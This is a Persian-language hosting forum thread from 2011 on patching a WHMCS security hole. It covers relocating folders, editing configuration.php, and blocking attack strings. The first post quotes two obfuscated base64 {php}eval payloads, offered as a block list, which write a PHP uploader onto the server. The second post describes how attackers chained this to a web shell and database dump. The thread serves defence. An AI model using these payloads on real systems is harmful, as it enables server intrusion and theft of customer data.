-
December 10th, 2011, 22:32
#1
آموزش رفع مشکل امنیتی whmcs
اول از همه نصب پچ امنیتی که در آدرس زیر هست
Security Patch - WHMCS Forums
و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه
بعد برید داخل فایل
configuration.php
و اونو به این شکل در بیارید
کد PHP:
<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>
به جای username نام کاربری یوزر سیپنل رو بنویسید
و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک
کد PHP:
{php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}
کد PHP:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
را بلوک کنید
به همین راحتی
دسترسی فایل کانفیگم بذارید رو 444
فقط پچ رو علاوه بر جایی که
whmcs
رو نصب کردید داخل
include
هم نصب کنید
-
تعداد تشکر ها ازmaryam1 به دلیل پست مفید
arvin_b, dertgtr, exactserver, it-net, kashaneh, konstantine, mehdi.gh, mehrshad.ho, nima17701, nimo0ol, om!d-D, parsvia, Persian-Talk, RezaFH, shirazlpi, SoltanHost.Net, T U R K, ToooPDL, vps-baran.ir
-
December 10th, 2011 22:32
# ADS
-
December 11th, 2011, 00:01
#2
پاسخ : آموزش رفع مشکل امنیتی whmcs
خدمت دوستان عزیز عرض کنم
روش این هک به این صورته
کد وقتی در تیکت ارسال میشه
فایل آپلودر در پوشه دانلود ایجاد میشه
b0x.php
سپس هکر با یک اسکریپت شل به راحتی میتونه دسترسی به فایل
مثل c99shell
معروف
configuration
و سپس خوندن مشخصات کامل دیتابیستون کنه
فایل شل هم بصورت
base64
آپلود کردن دهن سرویس ها
چون آنتی ویروس های سرور به سرعت شناساییش میکنن
حتی برای محکم کاری ظاهراً هر فایلی آپلود میشه آنتی ویروس سی پنل چک میکنه
اینا با یه روش نابغه گرانه
فایل رو بصورت
gzip
شده آپلود کردن و بعد از حالت کمپرس خارج کردن
سپس با همون شل میره وصل میشه به دیتابیس مربوطه و همه چیو دامپ و دانلود میکنه
patchi
هم که داده شده میاد این راه رو از طریق اصلاح فایل
functions
میبنده
جالبه بدونین
این گروهی که این هک رو داده
از اکسپلویت اخیر
Local File Disclosure
استفاده کاملتری کرده
و این مورد رو داده بیرون
با اینکه خودم طعمه این هک شدم و احساس بسیار بدی دارم که تمام تلاشام بی هوده بوده و از بین خواهد رفت
اما کارشون رو در نوشتن و اجرای این هک فوق العاده تحسین میکنم!
ضمناً اینم در نظر داشته باشید
تغییر و کم کردن سایز
text
در
submitticket
بی فایده هست و راه دور زدنش بسیار راحته!
(کاری که یکی از دوستان پیشنهاد داده بود)
الان میفهمم رعایت خیلی از نکات امنیتی
نه تنها بیمورد نیست
بلکه شرط کافی نیز نیست!
از جمله نصب این سیستم روی یک سرور جدا
استفاده نکردن از هاستینگ اشتراکی
نصب نداشتن سیستم های
cms
دیگر
استفاده نکردن از سیستم نال
و استفاده از لایسنس اصل
اصول حفاظت از اطلاعات مهم یک سایت هست
این مورد تجربه ای خواهد شد برای من و همه دوستان
گرچه ما ایرانیارو جون به جونمون کنن کار خودمونو میکنیم
فقط امیدوارم استفاده نا صحیح از اطلاعات دیتابیس من و خیلی دیگر از دوستان نشه
خیلی ناراحت کنندست اما به هر حال اتفاقیه که افتاده
ازین به بعد مراقب باشید
از قدیم گفتن اول امنیت خودتو رعایت کن
بعد خر ***و بچسبین
مایی که درمون رو قفل نزدیم
اینقدر دنبال اینکه کی مارو هک کرده نباشیم و این حرفای حاشیه ای
این جوجه هکر این کارو نمیکرد یکی دیگه میکرد
حالا سایت های خارجی رو ببینید
با این همه اطلاعات کارت های اعتباری ذخیره شده و لو رفته
ما که هیچی!
فقط یادتون باشه
اگر یکبار هک شده باشید
ممکنه هکر توی هر پوشه ای به هر اسمی یه شل گذاشته باشه!
پس بسیار مراقب باشید
در آخر منتظر فروش دیتابیس های سایت های بیچاره در روزهای آتی باشید
چه لذت و منفعتی برای اونا و چه بیچارگی برای ما خواهد داشت...
و در آخر پیشنهاد میکنم دستپاچه نشین قبل از هر کاری یه بک آپ از کل سیستم و فایلاتون بگیرین که اگه یه عوضی زد همشو پاک کرد وضع ازین بدتر نشه!
و سخن آخر با کسایی که اینکارو کردن یا میخوان بکنن
فکر نکنید با تغییر آی پی هر کاری خواستین میکنید
مطمئن باشید کسانی توی این فروم هستن که به راحتی پیداتون میکنن
و اونوقت دیگه کار از کار گذشته
مطمئن باشید کسایی که هک شدن بی کار نخواهند نشست
-
تعداد تشکر ها ازdm800pvr به دلیل پست مفید
-
December 11th, 2011, 01:20
#3
عضو انجمن
-
-
December 11th, 2011, 02:35
#4
عضو انجمن
پاسخ : آموزش رفع مشکل امنیتی whmcs
خود WHMCS بار ها تاکید کرده بود که دایرکتوری folder های download , templates_c و attachment رو تغییر بدید!
بنده این کار رو انجام دادم
دو ماه هست که تیکت های هکر ها را دریافت میکنیم (بیش از 150 عدد تیکت تا کنون دریافت شده) ولی مشکل امنیتی برای ما ایجاد نشده است.
در ضمن در پوشه download میتوانید با اضافه کردن یک Role در .httaccess کلا از اجرای PHP جلوگیری کنید. (قبلا اموزش رو در همین انجمن دیدم...)
ارادتمند
Email: hamihost [at] gmail (dot) com
-
تعداد تشکر ها از info_dlsong به دلیل پست مفید
-
December 11th, 2011, 02:50
#5
پاسخ : آموزش رفع مشکل امنیتی whmcs
-
-
December 11th, 2011, 07:32
#6
پاسخ : آموزش رفع مشکل امنیتی whmcs
اگه بحث اینه که شمام قبل از پست زدم یه سرچ بکنید
http://www.webhostingtalk.ir/f177/36031/
این تاپیکم به سفارش دوستان زدم
-
-
December 12th, 2011, 14:15
#7
عضو انجمن
پاسخ : آموزش رفع مشکل امنیتی whmcs
پچ امنیتی functions.php رو کدوم فایل بریزم؟
---------- Post added at 02:15 PM ---------- Previous post was at 02:12 PM ----------
نوشته اصلی توسط
info_dlsong
خود WHMCS بار ها تاکید کرده بود که دایرکتوری folder های download , templates_c و attachment رو تغییر بدید!
بنده این کار رو انجام دادم
دو ماه هست که تیکت های هکر ها را دریافت میکنیم (بیش از 150 عدد تیکت تا کنون دریافت شده) ولی مشکل امنیتی برای ما ایجاد نشده است.
در ضمن در پوشه download میتوانید با اضافه کردن یک Role در .httaccess کلا از اجرای PHP جلوگیری کنید. (قبلا اموزش رو در همین انجمن دیدم...)
ارادتمند
می تونی طریقه اضافه کردن Rolo رو کامل توضیح بدی؟
-
-
December 12th, 2011, 14:17
#8
پاسخ : آموزش رفع مشکل امنیتی whmcs
نوشته اصلی توسط
vps-baran.ir
پچ امنیتی functions.php رو کدوم فایل بریزم؟
داخل فولدر include جایگزین کن
-
-
December 12th, 2011, 14:34
#9
عضو انجمن
پاسخ : آموزش رفع مشکل امنیتی whmcs
این کد رو چه طوری جای گزین کنم
<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>
-
-
December 12th, 2011, 14:38
#10
پاسخ : آموزش رفع مشکل امنیتی whmcs
نوشته اصلی توسط
vps-baran.ir
این کد رو چه طوری جای گزین کنم
<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>
داخل فایل configuration.php ادیت کنید
-
پاسخ با نقل قول
